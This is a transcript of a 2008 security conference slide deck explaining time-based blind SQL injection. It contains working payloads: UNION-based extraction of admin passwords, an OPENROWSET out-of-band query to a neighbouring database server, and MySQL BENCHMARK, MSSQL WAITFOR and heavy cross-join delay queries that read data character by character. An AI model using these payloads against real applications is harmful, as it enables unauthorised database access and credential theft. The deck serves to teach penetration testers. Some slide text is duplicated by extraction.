Time based SQL Injection

© 2008 Security-Assessment.com

1

Time based SQL Injection

Presented by Muhaimin Dzulfakar


2

Who am I

Muhaimin Dzulfakar – 90% of kiwis can't pronounce it

Known as 'Emmie'

Security Consultant – Security-Assessment.com

Application and network pen-tester


3

Agenda

What is time based SQL Injection

Differences between blind and time based SQL Injection

Time based injection with heavy queries

Limitation of time based SQL Injection


4

Different types of SQL Injection

In Band Injection

Out of Band Injection

Blind SQL Injection

Time Based SQL Injection


5

In Band Injection

Results are embedded via union select

Useful when SQL error message is displayed

Fastest way to extract data

Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null, null, null, concat(username,0x3a,admin_password), null from admin/*


6

In Band Injection


7


Use a different communication channel to drill for data

Ex: Web Mail application in which data received via SMTP is processed

Example of attack: Accessing your neighbour database server with OOB injection

Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT

a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;

Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT

user, pass FROM users') AS a--


8


Web server

Database BDatabase A

OOB Injection

www.buyviagra.com

10.1.1.1


9

Blind SQL Injection

Application generates custom error message for failed response and normal page for successful response

Comparison between true and false response

AND 1=1 -> true AND 1=2 -> false

Read data byte by byte


10

Blind SQL Injection


11

Blind SQL Injection


12


Use time based to compare between true and false

For true response – time delay is executed

For failed response – time delay is not executed

Read data byte by byte – exactly the same method with blind injection

First example by Chris Anley's paper – More advanced SQL Injection

Another example is in David Litchfield paper – Data Mining with SQL Injection and Inference


13

Why we need Time Based SQL Injection

When the application generates default page for true or false response

When the application generates the same custom error page for true or false response

Injection is successful but can't be seen by the attacker


14

Scenario 1 (blind injection attack)

$default=1$default=1

if value is not between 1-20if value is not between 1-20

{{

redirect user to page.php?id=$defaultredirect user to page.php?id=$default

}}

SQL statement SQL statement

1 AND 1=1 [TRUE] -> default page displayed1 AND 1=1 [TRUE] -> default page displayed

1 AND 1=2 [FALSE] -> default page displayed1 AND 1=2 [FALSE] -> default page displayed

BLIND INJECTION FAILEDBLIND INJECTION FAILED


15

Scenario 1 (time based blind injection attack)

$default=1$default=1

if value is not between 1-20if value is not between 1-20

{{

redirect user to page.php?id=$defaultredirect user to page.php?id=$default

}}

SQL statement SQL statement

1 AND 1=1 [TRUE] -> take 5 seconds to 1 AND 1=1 [TRUE] -> take 5 seconds to response response

1 AND 1=2 [FALSE] -> take 1 second to 1 AND 1=2 [FALSE] -> take 1 second to responseresponse

TIME BASED BLIND INJECTION TIME BASED BLIND INJECTION SUCCESSSUCCESS


16

Scenario 2 (blind injection attack)

$values= 1 to 20 $values= 1 to 20

if the $values are not between 1-20if the $values are not between 1-20

{{

redirect user to error.phpredirect user to error.php

}}

SQL statementSQL statement

1 AND 1=1 [TRUE] -> error page displayed1 AND 1=1 [TRUE] -> error page displayed

1 AND 1=2 [FALSE] -> error page displayed1 AND 1=2 [FALSE] -> error page displayed

BLIND INJECTION FAILEDBLIND INJECTION FAILED


17

Scenario 2 (time based blind injection attack)

$values= 1 to 20 $values= 1 to 20

if the $values are not between 1-20if the $values are not between 1-20

{{

redirect user to error.phpredirect user to error.php

}}

SQL statementSQL statement

1 AND 1=1 [TRUE] -> take 5 seconds to 1 AND 1=1 [TRUE] -> take 5 seconds to responseresponse

1 AND 1=2 [FALSE] -> take 1 second to 1 AND 1=2 [FALSE] -> take 1 second to responseresponse

TIME BASED BLIND INJECTION TIME BASED BLIND INJECTION SUCCESSSUCCESS


18


TRUE = 2478msFALSE = 117ms


19

Spot the different

Blind injection (for mysql)

1 AND ASCII(substring((@@version),1,1))<52

if first character of database version is less than 4, it is

true

if first character of database version is 4 or more, it is

false query position operator

char


20

Spot the different

Time Based Blind injection (for MySQL)

1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))

if first character of database version is less than 4,

execute BENCHMARK

if first character of database version is not less than 4 ,

return 1position

operator time delayquery

char

count time


21

Time Based Injection on MSSQL

Time based injection (MSSQL)

1 AND if not(substring((select \@\@version),25,1) < 52)

waitfor delay '0:0:9'--

if the first character less than 4, execute waitfor delay

time delay

query

position operator char


22

Other Databases

Oracle (without PL/SQL support) MS Access, DB2 do not have delay functions

Time Based Injection is possible by using heavy queries

Chema Alonso and Jose Prada talked about this in Microsoft Security MVP Article and Defcon 2008

2 types of conditions in 'where clause'

Light Condition first

Heavy Condition first

Select A from B where ConditionAConditionA and ConditionBConditionB


23

Heavy condition first

100 Seconds

False-False

110 Seconds

TrueTrueTrue

110 Seconds

FalseFalseTrue

ResultHeavy & Light Condition

Light Condition

10sec

Heavy condition

100sec

Result from Alonso research


24

Light condition first

10Seconds

False-False

110 Seconds

TrueTrueTrue

110 Seconds

FalseFalseTrue

ResultHeavy & Light Condition

Heavy Condition

100sec

Light condition

10sec

Result from Alonso research


25

Heavies Queries

Oracle evaluates the conditions from left to right

MS Access evaluates the conditions from right to left

MSSQL evaluates light condition first

Table name needs to be known

Default table can be used for testing

MSSQL – sysussers

MySQL – information_schema.colums

Oracle - all_users


26

Heavies Queries

Example of time based injection using heavy queries on MSSQL (light condition evaluates first)

1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)

Suitable for databases that do not support time delay functions

Ex: Oracle and MS Accessheavy querylight query


27

Limitation

Results are not efficient during busy times

How to get efficient results ?

Review the ipid checking (hping3)

Perform the test at 3am

Perform the test during Xmas

For heavy queries, time delay depends on how much data is stored in database

The more data, more efficient are the result


28

Demo


29

Question ?

[email protected]

Time based SQL Injection

Documents

Transcript of Time based SQL Injection